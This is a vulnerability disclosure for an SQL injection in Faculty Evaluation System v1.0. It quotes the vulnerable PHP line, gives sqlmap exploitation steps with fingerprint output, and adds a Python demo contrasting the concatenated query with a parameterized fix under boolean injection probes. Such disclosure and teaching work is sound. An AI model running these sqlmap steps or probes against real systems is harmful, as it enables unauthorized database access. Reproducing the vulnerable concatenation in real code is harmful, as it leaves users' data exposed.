Friday, 7 July 2023

Full Disclosure - Faculty Evaluation System SQL Injection

  Application

  • Faculty Evaluation System v1.0

Information

  • Input not validated (the "id" GET parameter is never checked to be an integer)
  • No input filtering or escaping
  • SQL injection flaw in view_faculty.php


Exploit


File: view_faculty.php


Line #4


// The "id" GET parameter (index.php?page=view_faculty&id=<integer>) is concatenated straight into the query

[...]

$qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array();

[...]


Steps to Exploit:


1. Log in to the application (the page requires an authenticated session)

2. Browse to the following URI: "http://host/eval/index.php?page=view_faculty&id=1"

3. Save the authenticated request (including the session cookie) from an intercepting proxy to a file, e.g. test.txt

4. Exploit using sqlmap with the saved request


sqlmap -r test.txt  --threads 1 --dbms=mysql --fingerprint


[...]

[INFO] testing MySQL

[INFO] confirming MySQL

[INFO] the back-end DBMS is MySQL

[INFO] actively fingerprinting MySQL

[INFO] executing MySQL comment injection fingerprint

back-end DBMS: active fingerprint: MySQL >= 5.7

               comment injection fingerprint: MySQL 5.6.49

               fork fingerprint: MariaDB

[...]
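To make the injection point concrete, here is an added example (not code from the original post or from the Faculty Evaluation System) that rebuilds the query from view_faculty.php against an in-memory SQLite table and runs both the vulnerable concatenation and a hardened version. The table contents and column names are constructed for the demo; SQLite's `||` stands in for MySQL's `concat()`, and the boolean probes (`1 OR 1=1`, `1 AND 1=2`) are the kind of true/false pairs sqlmap uses when fingerprinting.

```python
import sqlite3

# Constructed sample rows standing in for the faculty_list table
# (assumption: column names follow the SELECT in view_faculty.php).
ROWS = [
    (1, "Alice", "Ng"),
    (2, "Bob", "Reyes"),
    (3, "Carol", "Santos"),
]


def make_db():
    """Build a throwaway in-memory database with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE faculty_list "
        "(id INTEGER PRIMARY KEY, firstname TEXT, lastname TEXT)"
    )
    conn.executemany("INSERT INTO faculty_list VALUES (?, ?, ?)", ROWS)
    conn.commit()
    return conn


def view_faculty_vulnerable(conn, id_param):
    """Mirror of the concatenation in view_faculty.php: the raw GET value is
    spliced into the SQL text, so anything after the number is executed."""
    sql = (
        "SELECT *, firstname || ' ' || lastname AS name "
        "FROM faculty_list WHERE id = " + id_param
    )
    return conn.execute(sql).fetchall()


def view_faculty_fixed(conn, id_param):
    """Hardened version: reject anything that is not a plain integer and bind
    the value as a parameter, so the SQL text never changes."""
    if not id_param.isdigit():
        raise ValueError("id must be an integer")
    sql = (
        "SELECT *, firstname || ' ' || lastname AS name "
        "FROM faculty_list WHERE id = ?"
    )
    return conn.execute(sql, (int(id_param),)).fetchall()


def probe(id_param):
    """Run one id value through both versions and summarise the outcome."""
    conn = make_db()
    vulnerable_rows = len(view_faculty_vulnerable(conn, id_param))
    try:
        fixed_rows = len(view_faculty_fixed(conn, id_param))
        rejected = False
    except ValueError:
        fixed_rows = 0
        rejected = True
    return {"vulnerable_rows": vulnerable_rows,
            "fixed_rows": fixed_rows,
            "rejected": rejected}


if __name__ == "__main__":
    for payload in ("1", "1 OR 1=1", "1 AND 1=2"):
        print(repr(payload), probe(payload))
```

Run it and the vulnerable path returns one row for `1`, every row for `1 OR 1=1` and nothing for `1 AND 1=2`, which is exactly the true/false difference a blind injection tool keys on; the fixed path answers the legitimate request and refuses the other two before any SQL runs. In the PHP original the equivalent fix is an integer cast or validation of `$_GET['id']` plus a prepared statement instead of string concatenation.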
